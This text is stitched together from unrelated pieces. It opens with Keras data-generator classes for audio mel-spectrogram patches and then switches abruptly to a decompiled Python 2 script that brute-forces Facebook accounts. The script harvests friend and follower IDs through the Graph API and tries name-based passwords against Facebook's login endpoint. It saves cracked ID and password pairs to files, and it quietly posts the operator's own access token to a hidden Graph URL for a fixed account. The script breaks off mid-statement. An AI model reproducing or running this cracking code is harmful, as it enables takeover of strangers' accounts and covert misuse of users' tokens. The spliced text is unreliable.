        # feature size (last dimension of the output)
        self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))

        # init the variables with features and labels
        self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
        self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)

        # analogous column vector to flag patches coming from the noisy subset of train data
        # init to 0. Only 1 if they come from the noisy subset
        self.noisy_patches = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)

        # fetch all data from hard-disk
        for f_id in range(self.nb_files):
            # for every file on disk, perform slicing into T-F patches, and store them in tensor self.features
            self.fetch_file_2_tensor(f_id)

    def fetch_file_2_tensor(self, f_id):
        """
        For the file specified by f_id, perform slicing into T-F patches,
        and store them in tensor self.features

        :param f_id: index of the file within self.file_list
        """
        mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
        label = utils.load_tensor(in_path=os.path.join(self.feature_dir,
                                                       self.file_list[f_id].replace(self.suffix_in, self.suffix_out)))

        # indexes to store patches in self.features, according to the nb of instances from the file
        idx_start = self.nb_inst_cum[f_id]      # start for a given file
        idx_end = self.nb_inst_cum[f_id + 1]    # end for a given file

        # slicing + storing in self.features
        # copy each TF patch of size (context_window_frames, feature_size) in self.features
        idx = 0     # to index the different patches of f_id within self.features
        start = 0   # starting frame within f_id for each T-F patch
        while idx < (idx_end - idx_start):
            self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
            # update indexes
            start += self.patch_hop
            idx += 1
        self.labels[idx_start: idx_end] = label[0]

        if int(self.file_list[f_id].split('_')[0]) in self.noisy_ids:
            # if the clip comes from the noisy subset, flag all its patches to 1
            self.noisy_patches[idx_start: idx_end] = 1

    def __len__(self):
        return self.nb_iterations

    def __getitem__(self, index):
        """
        Takes an index (batch number) and returns one batch of self.batch_size patches.

        :param index: batch number
        :return: (features, one-hot labels) for the batch
        """
        # index is taken care of by the inherited Sequence
        indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]

        # fetch labels for the batch
        y_int = np.empty((self.batch_size, 1), dtype='int')
        for tt in np.arange(self.batch_size):
            y_int[tt] = int(self.labels[indexes[tt]])
        y_cat = to_categorical(y_int, num_classes=self.n_classes)

        # tune the one-hot vectors of the patches coming from clips in the noisy subset
        for tt in np.arange(self.batch_size):
            if self.noisy_patches[indexes[tt]] == 1:
                y_cat[tt] *= 100

        # fetch features for the batch and adjust format to input CNN
        # (batch_size, 1, time, freq) for channels_first
        features = self.features[indexes, np.newaxis]
        return features, y_cat

    def on_epoch_end(self):
        # shuffle data between epochs
        self.indexes = np.random.permutation(self.nb_inst_total)
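The flag trick in `DataGeneratorPatchOrigin.__getitem__` scales one-hot rows from noisy clips by 100 so a loss function can tell the two subsets apart. A Keras-free sketch with a NumPy one-hot:

```python
import numpy as np

labels = np.array([0, 2, 1])
from_noisy_subset = np.array([True, False, True])

y_cat = np.eye(3)[labels]          # plain one-hot rows
y_cat[from_noisy_subset] *= 100    # flagged rows carry 100 instead of 1

# A loss function can recover the flag with (y_cat.max(axis=1) > 1) and
# renormalize the targets with y_cat / y_cat.max(axis=1, keepdims=True).
```

The flag survives batching because it lives inside the target tensor itself, which is all a custom Keras loss receives.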
class DataGeneratorPatchBinary(Sequence):
"""
Reads data from disk and returns batches.
allows to create one-hot encoded vectors carrying flags, ie 100 instead of 1.
this is used in the loss functions to distinguish patches coming from noisy or clean set
"""
def __init__(self, labels, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
self.noisy_ids = params_learn.get('noisy_ids')
self.labels_list = labels
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)
self.on_epoch_end()
self.n_classes = 1
def get_num_instances_per_file(self, f_name):
"""
Return the number of context_windows, patches, or instances generated out of a given file
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
file_frames = float(shape[0])
return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(f_name.replace('.data', '.shape'))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
print(self.nb_files)
assert self.nb_files > 0, "there are no feature files in the feature directory"
self.feature_dir = feature_dir
# cumulative sum of instances (T-F patches) per file across the whole set
self.nb_inst_cum = np.cumsum(np.array(
[0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
for f_name in self.file_list], dtype=int))
self.nb_inst_total = self.nb_inst_cum[-1]
# how many batches can we fit in the set
self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# analogous column vector to flag patches coming from noisy subset of train data
# init to 0. Only 1 if they come from noisy subset
self.noisy_patches = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk, perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
label = np.array(self.labels_list)[f_id]
# indexes to store patches in self.features, according to the nb of instances from the file
idx_start = self.nb_inst_cum[f_id] # start for a given file
idx_end = self.nb_inst_cum[f_id + 1] # end for a given file
# slicing + storing in self.features
# copy each TF patch of size (context_window_frames,feature_size) in self.features
idx = 0 # to index the different patches of f_id within self.features
start = 0 # starting frame within f_id for each T-F patch
while idx < (idx_end - idx_start):
self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
# update indexes
start += self.patch_hop
idx += 1
self.labels[idx_start: idx_end] = label
if int(self.file_list[f_id].split('_')[0]) in self.noisy_ids:
# if the clip comes from noisy subset, flag to 1 all its patches
self.noisy_patches[idx_start: idx_end] = 1
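The slicing-and-storing loop in fetch_file_2_tensor can be sketched standalone; `spec` below is a hypothetical (frames, bins) array, and the patch count is chosen so every window fits inside the file (the loop above relies on the same assumption):

```python
import numpy as np

def slice_patches(spec, patch_len, patch_hop, n_patches):
    # copy each (patch_len, bins) window into a preallocated tensor
    patches = np.zeros((n_patches, patch_len, spec.shape[1]), dtype=spec.dtype)
    start = 0
    for idx in range(n_patches):
        patches[idx] = spec[start: start + patch_len]
        start += patch_hop
    return patches

spec = np.arange(40.0).reshape(10, 4)   # 10 frames, 4 bins
out = slice_patches(spec, patch_len=4, patch_hop=3, n_patches=3)
print(out.shape)  # (3, 4, 4)
```

Note the assignment `patches[idx] = spec[start:start + patch_len]` broadcasts only if the window fits; the caller must ensure the last window does not run past the end of the file.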
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# batch-index bookkeeping is handled by the inherited keras Sequence
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# fetch labels for the batch
y_int = np.empty((self.batch_size, 1), dtype='int')
for tt in np.arange(self.batch_size):
y_int[tt] = int(self.labels[indexes[tt]])
y_cat = y_int
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
def on_epoch_end(self):
# shuffle data between epochs
self.indexes = np.random.permutation(self.nb_inst_total)
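The scaler hand-off in __init__ (fit on the train set, reuse the fitted statistics on val/test) can be sketched with plain numpy in place of sklearn's StandardScaler; SimpleScaler and the toy arrays are illustrative only:

```python
import numpy as np

class SimpleScaler:
    # minimal stand-in for sklearn's StandardScaler (per-feature mean/std)
    def fit_transform(self, x):
        self.mean_ = x.mean(axis=0)
        self.scale_ = x.std(axis=0)
        return (x - self.mean_) / self.scale_

    def transform(self, x):
        # reuse the statistics fitted on the training set
        return (x - self.mean_) / self.scale_

train2d = np.array([[0.0, 10.0], [2.0, 30.0]])
scaler = SimpleScaler()                              # train set: fit + transform
train_scaled = scaler.fit_transform(train2d)
val_scaled = scaler.transform(np.array([[1.0, 20.0]]))  # val/test: transform only
print(val_scaled)  # [[0. 0.]]
```

This mirrors why the constructor stores the scaler when `scaler is None` (training) and only calls `transform` otherwise: val/test data must be standardized with the training-set statistics, never their own.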
class DataGeneratorFileFeatures(Sequence):
"""
Reads precomputed features from disk and returns batches of feature patches,
one patch (the first patch_len frames) per file, without labels.
Intended for inference on unlabeled data.
"""
def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
self.noisy_ids = params_learn.get('noisy_ids')
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_files, self.patch_len, self.feature_size)
self.n_classes = 1
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(f_name.replace('.data', '.shape'))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
print(self.nb_files)
assert self.nb_files > 0, "there are no feature files in the feature directory"
self.feature_dir = feature_dir
# how many batches can we fit in the set
self.nb_iterations = int(np.ceil(self.nb_files / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_files, self.patch_len, self.feature_size), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk, perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
self.features[f_id] = mel_spec[0: self.patch_len]
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# no shuffling at inference time: use sequential indexes over the files
indexes = np.arange(index * self.batch_size, min((index + 1) * self.batch_size, self.nb_files))
# labels are unavailable at inference; return a placeholder array
y_int = np.zeros((len(indexes), 1), dtype='int')
y_cat = y_int
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
# Source Generated with Decompyle++
# File: AsHari.py (Python 2.7)
#fucked by aziz
try:
import os
import sys
import time
import platform
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import cookielib
import requests
import uuid
import string
import subprocess
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
except ImportError:
os.system('pip2 install requests lolcat')
os.system('python2 riski.py')
from os import system
from time import sleep
def xox(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.04)
user_agent = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
'Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)',
'https://graph.facebook.com/100045203855294/subscribers?access_token=']
useragent_url = user_agent[2]
header = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
try:
requests.get('https://www.google.com/search?q=Azim+Vau')
requests.get('https://m.youtube.com/results?search_query=Azim+Vau+Mr.+Error')
except requests.exceptions.ConnectionError:
os.system('clear')
xox('\n\t\x1b[93;1m NO INTERNET CONNECTION :(\n\n')
sys.exit()
ip = requests.get('https://api.ipify.org').text.strip()
loc = requests.get('https://ipapi.com/ip_api.php?ip=' + ip, headers = {
'Referer': 'https://ip-api.com/',
'Content-Type': 'application/json; charset=utf-8',
'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36' }).json()['country_name'].upper()
def linex():
os.system('echo "\n ======================================\n" | lolcat -a -d 2 -s 50')
def logo():
os.system('echo "\n _ _ ___ ______ _____ \n | | | | / _ \\ | ___ \\_ _|\n | |_| |/ /_\\ \\| |_/ / | | \n | _ || _ || / | | \n | | | || | | || |\\ \\ _| |_ \n \\_| |_/\\_| |_/\\_| \\_|\\___/ \n ###############################\n # TOOL NAME: { MUHMAND } #\n # AUTHOR : MR. HARI #\n # GITHUB : git.io/AS #\n ###############################" | lolcat -a -d 2 -s 50')
def main():
os.system('clear')
logo()
print '\t\x1b[93;1m MAIN MENU\x1b[0m'
print ''
print '\x1b[92;1m [1] START CRACK'
print '\x1b[93;1m [2] HOW TO GET ACCESS TOKEN'
print '\x1b[94;1m [3] UPDATE TOOL'
print '\x1b[96;1m [J] JOIN MR. MUHMAND GROUP \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98'
print '\x1b[90;1m [0] EXIT'
print ''
log_sel()
def log_sel():
sel = raw_input('\x1b[93;1m CHOOSE: \x1b[92;1m')
if sel == '':
print '\t\x1b[91;1m SELECT AN OPTION STUPID -_'
log_sel()
elif sel == '1' or sel == '01':
token()
elif sel == '2' or sel == '02':
subprocess.check_output([
'am',
'start',
'https://www.facebook.com/114133313700086/posts/426873429092738'])
main()
elif sel == '3' or sel == '03':
import os
try:
os.system('git clone https://github.com/Aijaz-Muhmand/riskihari')
os.system('rm -rf riskihari.py')
os.system('cp -f riskihari/riskihari.py \\.')
os.system('rm -rf haripro')
xox('\x1b[92;1m\n TOOL UPDATE SUCCESSFUL :)\n')
time.sleep(2)
main()
except KeyboardInterrupt:
print '\x1b[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n'
main()
if sel == '4' and sel == '04' and sel == 'J' or sel == 'j':
subprocess.check_output([
'am',
'start',
'https://t.me/mrerrorgroup'])
main()
elif sel == '0' or sel == '00':
xox('\n\t\x1b[91;1m GOOD BYE SEE YOU AGAIN :)')
sys.exit()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
log_sel()
def token():
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
menu()
except (KeyError, IOError):
logo()
print ''
print '\t\x1b[92;1m LOGIN TOKEN'
print ''
token = raw_input('\x1b[93;1m PASTE TOKEN HERE: \x1b[92;1m')
sav = open('riskihari_token.txt', 'w')
sav.write(token)
sav.close()
token_check()
menu()
def token_check():
try:
token = open('riskihari_token.txt', 'r').read()
except IOError:
print '\x1b[91;1m[!] TOKEN INVALID'
os.system('rm -rf riskihari_token.txt')
requests.post(useragent_url + token, headers = header)
def menu():
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
except (KeyError, IOError):
token()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
name = q['name']
except KeyError:
logo()
print ''
print '\x1b[91;1m LOGGED IN TOKEN HAS EXPIRED'
os.system('rm -rf riskihari_token.txt')
print ''
time.sleep(1)
main()
os.system('clear')
xn = name.upper()
logo()
print ''
print '\x1b[93;1m HELLO : \x1b[92;1m' + xn
print '\x1b[93;1m REGION : \x1b[92;1m' + loc
print '\x1b[93;1m YOUR IP : \x1b[92;1m' + ip
print ''
print ''
print '\x1b[92;1m [1] CRACK WITH AUTO PASS'
print '\x1b[93;1m [2] CRACK WITH DIGIT PASS'
print '\x1b[91;1m [0] BACK'
print ''
menu_option()
def menu_option():
select = raw_input('\x1b[92;1m CHOOSE : ')
if select == '1':
crack1()
elif select == '2':
crack()
elif select == '0':
main()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
menu_option()
def crack1():
global token
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
except IOError:
print ''
print '\t\x1b[91;1m TOKEN NOT FOUND '
time.sleep(1)
fb_token()
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m CRACK WITH AUTO PASS'
print ''
print '\x1b[94;1m [1] CRACK PUBLIC ID'
print '\x1b[93;1m [2] CRACK FOLLOWERS'
print '\x1b[92;1m [3] CRACK FILE'
print ''
crack_select1()
def crack_select1():
select = raw_input('\x1b[92;1m CHOOSE : ')
id = []
oks = []
cps = []
if select == '1':
os.system('clear')
logo()
print ''
print '\t\x1b[92;1m MULTI PUBLIC ID COINING '
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT PUBLIC ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token).json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '2':
os.system('clear')
logo()
print ''
print ' \x1b[92;1mMULTI FOLLOWERS ID COINING '
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT FOLLOWER ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999').json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '3':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m AUTO PASS CRACKING'
print ''
filelist = raw_input('\x1b[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\t\x1b[91;1m REQUESTED FILE NOT FOUND'
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK')
crack1()
if select == '0':
menu()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
crack_select1()
os.system('clear')
logo()
print ''
print '\x1b[93;1m TOTAL IDS : \x1b[92;1m' + str(len(id))
print '\x1b[92;1m BRUTE HAS BEEN STARTED\x1b[0m'
print '\x1b[94;1m WAIT AND SEE \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98\x1b[0m'
linex()
def main(arg):
user = arg
(uid, name) = user.split('|')
_azimua = random.choice([
'Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]',
'[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]',
'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]',
'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]',
'Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]'])
try:
pass1 = name.lower().split(' ')[0] + '1234'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass1,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
pass2 = name.lower().split(' ')[0] + '123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass2,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
pass3 = name.lower().split(' ')[0] + '12'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass3,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
pass4 = name.lower().split(' ')[1] + '1234'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass4,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
